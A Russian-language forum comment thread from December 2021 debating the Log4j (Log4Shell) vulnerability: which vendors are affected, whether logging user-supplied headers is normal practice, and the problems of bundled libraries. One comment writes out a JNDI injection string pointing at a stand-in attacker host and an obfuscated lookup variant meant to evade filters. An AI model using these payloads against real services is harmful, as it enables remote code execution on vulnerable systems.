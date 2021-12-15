2.9 , Аноним ( 9 ), 10:55, 15/12/2021 [^] [^^] [^^^] [ответить] +8 + / – Как соотносится "использует полтора программиста" и подтверждённое проявление уязвимости в продуктах GitHub, Docker, Oracle, vmWare, Broadcom и Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, Intel, NATS, Trend Micro, Aruba Networks, Microsoft, Siemens и Rockwell? Это одна из самых опасных уязвимостей за последние лет 5, из-за того, что затрагивает кучу банковского, телекоммуникационного, корпоративного и промышленного софта. И это только начало, дальше можно ждать волну supply chain атак после взлома инфраструктур производителей. 3.11 , Аноним ( 7 ), 11:01, 15/12/2021 [^] [^^] [^^^] [ответить] –3 + / – > Как соотносится "использует полтора программиста" и подтверждённое проявление уязвимости в продуктах GitHub, Docker, Oracle, vmWare, Broadcom и Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, Intel, NATS, Trend Micro, Aruba Networks, Microsoft, Siemens и Rockwell? Фактом наличия в зависимостях проектов. То есть, никак, по факту.

4.12 , полураспад ( ? ), 11:05, 15/12/2021 [^] [^^] [^^^] [ответить] + / – в нормальном коде не выводятся параметры приходящие от пользователя в лог, плюс это проверка давно существует в анализаторах безопастности, они показывают где параметры из запросов логируются в лог

5.14 , Аноним ( 13 ), 11:11, 15/12/2021 [^] [^^] [^^^] [ответить] +3 + / – Выходит "нормальный" по вашим представлениям код в корпоративной среде не встречается. Плюс на практике было показано как уязвимость работала в системах Amazon, Microsoft и многих других. У них "анализаторы безопасности" тоже какие-то неправильные?

К чему в таком случае вся эта ремарка?

6.93 , Аноньимъ ( ok ), 18:43, 15/12/2021 [^] [^^] [^^^] [ответить] + / – >Выходит "нормальный" по вашим представлениям код в корпоративной среде не встречается. А ведь он прав.

5.18 , Аноним ( 18 ), 11:20, 15/12/2021 [^] [^^] [^^^] [ответить] + / – Скажите это тем, кто пишет в лог значение User Agent, X-Forward-For и прочих заголовков. В логи такое пишут повсеместно.

5.28 , Фняк ( ? ), 11:55, 15/12/2021 [^] [^^] [^^^] [ответить] +2 + / – Это почему? Вот вызвали функцию с какими-то параметрами. Функция проверила параметры и какие-то из них не валидны. Перед тем как вернуть соответствующий код возврата она пишет в лог сообщение о том что вот не получилось выполнить работу потому во то условие не выполняется при вот этих входных параметрах. Пишет это она для админа на случай если к нему придут с вопросами «а почему не работает?» функция сама по себе понятия не имеет откуда переданные параметры взялись, от пользователя или ещё откуда

5.30 , пох. ( ? ), 11:58, 15/12/2021 [^] [^^] [^^^] [ответить] +6 + / – точно, нормальный код логает в лог только ok и error. Предоставляя гадать, что именно было ok и чего error. Дайте угадаю - вы разработчик на модном языке? 5.76 , quantic ( ? ), 15:06, 15/12/2021 [^] [^^] [^^^] [ответить] + / – Проблема не в том что значения от пользователя выводятся в лог, проблема в том что log4j их не фильтрует. Это их факап.

4.20 , Аноним ( 18 ), 11:22, 15/12/2021 [^] [^^] [^^^] [ответить] +1 + / – Это компании которые _сами_ подтвердили проявление уязвимости Log4j в своих продуктах. Логи с отражением User Agent по умолчанию ведут почти все корпоративные системы.

5.31 , Аноним ( - ), 11:58, 15/12/2021 [^] [^^] [^^^] [ответить] –1 + / – 1) Далеко не все делают бесконтрольную подстановку данных, принятых от пользователя, непосредственно в ".. {}.." лога.

2) Не самый распространённый случай использования JNDI внутри организации.

3) Неплохо бы иметь доступ к ресурсам JNDI из сети, где расположен сервис. А теперь вопрос - скольких компаний это реально касается до такой степени, чтобы кричать "ужас-ужас"?

6.40 , Аноним ( 40 ), 12:36, 15/12/2021 [^] [^^] [^^^] [ответить] +1 + / – > не все делают бесконтрольную подстановку данных, принятых от пользователя, непосредственно в ".. {}.." лога. А как надо правильно логировать http запрос от пользователя?

7.42 , Аноним ( 7 ), 12:45, 15/12/2021 [^] [^^] [^^^] [ответить] +1 + / – Любым способом, не подразумевающим подстановку поля, полученного от пользователя в конструкцию "{}". Вроде не сложно такой подобрать PS: если руководствоваться здравым смыслом при написании программы, то случаев, когда значения HTTP-заголовков подставляются в log4j непосредственно, не так уж и много. И вообще, не приходит в голову, когда это может понадобиться.

8.48 , Урри ( ok ), 12:56, 15/12/2021 [^] [^^] [^^^] [ответить] + / – текст свёрнут, показать А если уже в полученном от пользователя поле ... 9.53 , Аноним ( - ), 13:05, 15/12/2021 [^] [^^] [^^^] [ответить] –1 + / – текст свёрнут, показать msg replace , Ну, или, не используйте log4j2 ... 10.54 , Аноним ( 54 ), 13:17, 15/12/2021 [^] [^^] [^^^] [ответить] + / – текст свёрнут, показать Вы лучше не используйте replace Ибо 7B... 11.70 , Аноним ( 7 ), 14:38, 15/12/2021 [^] [^^] [^^^] [ответить] + / – текст свёрнут, показать 7B тоже log4j2 интерпретирует ... 8.65 , примерно_36_скотинок ( ok ), 14:02, 15/12/2021 [^] [^^] [^^^] [ответить] + / – текст свёрнут, показать утверждая, что их дерьмо надо было покрыть глазурью, посахарить и вот-тогда-то п... 8.73 , Аноним ( 40 ), 14:51, 15/12/2021 [^] [^^] [^^^] [ответить] + / – текст свёрнут, показать Если я подставлю допустим объект, содержащий тело и мапу заголовков - это нормал... 9.92 , Аноним ( 7 ), 18:33, 15/12/2021 [^] [^^] [^^^] [ответить] + / – текст свёрнут, показать Пример из оригинала - https www lunasec io docs blog log4j-zero-day example-v... 7.77 , YetAnotherOnanym ( ok ), 15:07, 15/12/2021 [^] [^^] [^^^] [ответить] + / – > А как надо правильно логировать http запрос от пользователя? Дословно, с предварительным обеззараживанием, обесклычиванием, убеганием и прочими аналогичными процедурами.

6.60 , Аноним ( 60 ), 13:40, 15/12/2021 [^] [^^] [^^^] [ответить] + / – Достаточно любой подстановки внешних данных в лог, не важно как они переданы через подстановку или голой строкой. Главная проблема в этой узявимости, что Log4j сам разберёт "${..}" в выводимой строке, никаких особых подстановок для этого делать не нужно. Т.е. написал в коде "logger.info(extvar);" и можно хакнуть, если есть возможность переть в extvar что-то типа "${jndi:ldap://attacker.com/a}" или "${env:FOO:-j}ndi:${lower:L}da${lower:P}", как в примере в новости.

7.72 , Аноним ( 7 ), 14:46, 15/12/2021 [^] [^^] [^^^] [ответить] + / – Как хорошо, что ничего кроме slf4j/logback у нас не используется....

3.29 , пох. ( ? ), 11:56, 15/12/2021 [^] [^^] [^^^] [ответить] +1 + / – Причем жопа в том что это как раз то о чем многажды говорили большевики - пытаясь заставить формошлепов использовать библиотеки операционной системы, а не намертво слинковать прожект с кучей мусора со всего интернета, непременнейше - наираспоследней версии на момент линковки. Но это немодно, немолодежно и в модных-современных язычках вообще неосуществимо. Поэтому в отличие от вполне тоже опасных и реальных уязвимостей в той же openssl - нельзя исправить большую часть проблем банально обновив "открытую" библиотеку. Будем сидеть и ждать пока орацле, броацом и амазоны с жуниперами разродятся - по каждому из миллиона своих подeлий отдельно. 4.69 , макпыф ( ok ), 14:21, 15/12/2021 [^] [^^] [^^^] [ответить] + / – просто системные либы могут быть разные. А модно молодежным програмистам хочется подключить 100500 либ, а вот поддерживать это все - нет. Потому просто бандлят единственно верную версию и статически/странным образом прибивают гвоздями. Обновляется это все конечно только в случае пинка под зад. Потому мне приходится 100500 часов компилить забандленные в пакет либы (причем многолетней выдержки), когда я пару часов назад уже скомпилил их (причем актуальной версии). Можно конечно пытаться патчить все это дерьмо, на так как все заточенно под единственно верную версию - может быть очень много геморроя. Итого: все это дерьмо с "релизами" где обновленна какая нибудь nss/log4j и многочасовая компиляция ни пойми чего.

